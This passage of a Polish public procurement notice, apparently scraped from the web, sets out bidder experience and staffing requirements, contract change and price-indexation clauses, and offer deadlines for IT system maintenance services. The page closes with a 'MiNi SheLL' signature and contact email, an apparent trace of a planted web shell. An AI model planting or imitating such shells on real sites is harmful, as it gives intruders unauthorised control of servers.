złożenia, następujących podmiotowych środków dowodowych:<br/><br/>1)	Wykazu usług potwierdzającym wykonanie bądź wykonywanie w okresie ostatnich 5 lat przed upływem terminu składania Ofert, a jeżeli okres działalności jest krótszy – to w tym okresie, co najmniej dwóch usług polegających na opiece nad systemem informatycznym, tj. wprowadzaniu poprawek do systemu i wykonywaniu czynności administracyjnych, przez okres co najmniej 12 miesięcy, w zakresie co najmniej: <br/>Finanse i księgowość, Majątek trwały, Obrót towarowy, Kadry i płace, Raporty i Analizy dla zadania numer 1 <br/>oraz <br/>Elektroniczny Obieg Dokumentów dla zadania numer 2.<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Wykaz zaleca się złożyć zgodnie ze wzorem wskazanym w załączniku nr 2d do SWZ.<br/><br/>2)	Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami z którego będzie wynikać, że Wykonawca dysponuje lub będzie dysponował co najmniej:<br/><br/>- Kierownikiem Zespołu serwisu – liczba osób – co najmniej 1, który będzie posiadał co najmniej 2 letnie doświadczenie zawodowe w zakresie kierowania zespołem świadczącym usługi opieki serwisowej dla systemu informatycznego, nabyte poprzez uczestnictwo w ciągu ostatnich 5 lat przed upływem terminu składania Ofert w co najmniej 2 projektach informatycznych opieki serwisowej systemu informatycznego;<br/><br/>- Pracownikami serwisu – co najmniej 2 osoby, posiadające doświadczenie w administrowaniu systemami: <br/>SIMPLE.ERP, XPRIMER.BI, SIMPLE.HCM, WSO2 ESB dla zadania 1, <br/>DocuSafe dla zadania nr 2 <br/>nabyte poprzez uczestnictwo w ciągu ostatnich 5 lat przed upływem terminu składania Ofert w co najmniej dwóch projektach informatycznych opieki serwisowej systemu informatycznego.<br/>Wykaz zaleca się złożyć zgodnie ze wzorem wskazanym w załączniku nr 2e do SWZ.<br/><br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku:<br/>• Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>• Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający informuje, że przewiduje możliwości zmiany umowy. Zmiany zawartej umowy mogą nastąpić w następujących przypadkach:<br/>1)	gdy wystąpią przeszkody o obiektywnym charakterze (zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia, a więc mieszczące się w zakresie pojęciowym tzw. „siły wyższej.”) np. pogoda uniemożliwiająca wykonywanie umowy, zdarzenia nie leżące po żadnej ze stron umowy. Strony mają prawo do skorygowania uzgodnionych zobowiązań i przesunięcia terminu realizacji maksymalnie o czas trwania siły wyższej. Strony zobowiązują się do natychmiastowego poinformowania się nawzajem o wystąpieniu ww. przeszkód,<br/>2)	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia – Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia,<br/>2.	Zamawiający przewiduje zmiany wysokości wynagrodzenia Wykonawcy w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją umowy w rozumieniu art. 439 Pzp na zasadach opisanych w ust. 4 pkt 1), 2) i 3) . Przez zmianę ceny materiałów lub kosztów rozumie się wzrost odpowiednio cen lub kosztów, jak i ich obniżenie, względem ceny lub kosztu przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie. Jako materiały oraz wzrost kosztów realizacji umowy uznaje się wzrost cen serwisowych usług informatycznych/<br/>3.	Strony umowy będą uprawnione do zmiany wynagrodzenia Wykonawcy, o ile poziom zmiany ceny materiałów lub kosztów, przez który rozumie się średnioroczny wskaźnik cen towarów i usług konsumpcyjnych za rok poprzedni, publikowany przez Prezesa Głównego Urzędu Statystycznego, osiągnie poziom co najmniej 10%. Maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza Zamawiający w efekcie zastosowania postanowień o zasadach wprowadzania zmian wynosi 30% wynagrodzenia Wykonawcy ustalonego pierwotnie w umowie za serwisowe usługi informatyczne. Wysokość wynagrodzenia Wykonawcy w rozliczeniu okresowym ulegnie zmianie o wielkość średniorocznego wskaźnika cen towarów i usług konsumpcyjnych za rok poprzedni. Wynagrodzenie należne Wykonawcy zostanie powiększone o Wskaźnik. <br/>4.	Strony ustalają następujące zasady zmiany wynagrodzenia: <br/>1)	waloryzacja wynagrodzenia możliwa jest jednorazowo w trakcie trwania niniejszej umowy na wniosek, który złożony może być nie wcześniej niż po upływie 6 miesięcy od dnia rozpoczęcia realizacji umowy i nie później niż 1 miesiąc przed upływem terminu realizacji umowy.<br/>2)	waloryzacja nie dotyczy wynagrodzenia za usługi wykonane przed datą złożenia wniosku lub które zgodnie z umową miały być wykonane w ciągu 6 miesięcy od dnia rozpoczęcia realizacji umowy, chyba, że opóźnienie wynika z przyczyn leżących po stronie Zamawiającego lub z przyczyn niezależnych od Wykonawcy.<br/>3)	Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z ust. 2, zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione są następujące warunki:<br/>a)	przedmiotem umowy są usługi,<br/>b)	okres obowiązywania umowy przekracza 6 miesięcy.<br/>5.	Jeżeli w trakcie obowiązywania umowy nastąpi zmiana stawki podatku VAT, w takim przypadku umowa nie ulegnie zmianie w zakresie wysokości ceny brutto.<br/>6.	Strony dopuszczają możliwość zmian redakcyjnych, omyłek pisarskich oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych bez konieczności sporządzania aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pm_szczecin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-12 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com